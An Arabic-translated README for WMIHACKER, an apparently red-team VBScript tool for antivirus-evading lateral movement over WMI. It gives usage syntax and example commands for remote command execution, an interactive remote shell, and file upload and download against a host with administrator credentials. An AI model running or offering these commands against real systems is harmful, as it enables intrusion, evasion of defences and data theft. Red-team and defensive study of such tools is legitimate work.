
أداة تنفيذ أوامر الحركة الجانبية لتجاوز برامج مكافحة الفيروسات
النسخة الصينية (Chinese version)
إخلاء مسؤولية: التقنية المتعلقة بهذا المشروع مخصصة فقط لأغراض التعلم الأمني والدفاع، ويُحظر الاستخدام غير القانوني!
أداة اختبار تنفيذ الأوامر عبر التحرك الجانبي لتجاوز برامج مكافحة الفيروسات (لا حاجة لمنفذ 445)
مقدمة: الأدوات الشائعة مثل WMIEXEC و PSEXEC تنفذ الأوامر عن طريق إنشاء خدمة أو استدعاء Win32_Process.create، وقد تم اعتراض هذه الطرق بنسبة 100% بواسطة برامج مكافحة الفيروسات، لذا قمنا بإنشاء WMIHACKER (أداة اختبار تنفيذ الأوامر عبر التحرك الجانبي لتجاوز برامج مكافحة الفيروسات (لا حاجة لمنفذ 445)).
الوظائف الرئيسية: 1. تنفيذ الأوامر؛ 2. رفع الملفات؛ 3. تنزيل الملفات
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
الاستخدام:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd وضع الأمر الفردي
host اسم المضيف أو عنوان IP
GETRES? هل النتيجة مطلوبة؟ استخدم 1 أو 0
command الأمر المطلوب تنفيذه على المضيف البعيد
عرض النتيجة بعد تنفيذ الأمر
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
عدم عرض النتيجة بعد تنفيذ الأمر
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
وضع الصدفة (shell)
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
رفع ملف: نسخ calc.exe المحلي إلى المضيف البعيد c:\calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
تنزيل ملف: تنزيل calc.exe من المضيف البعيد إلى المحلي c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
انضم WMIHACKER إلى 404Starlink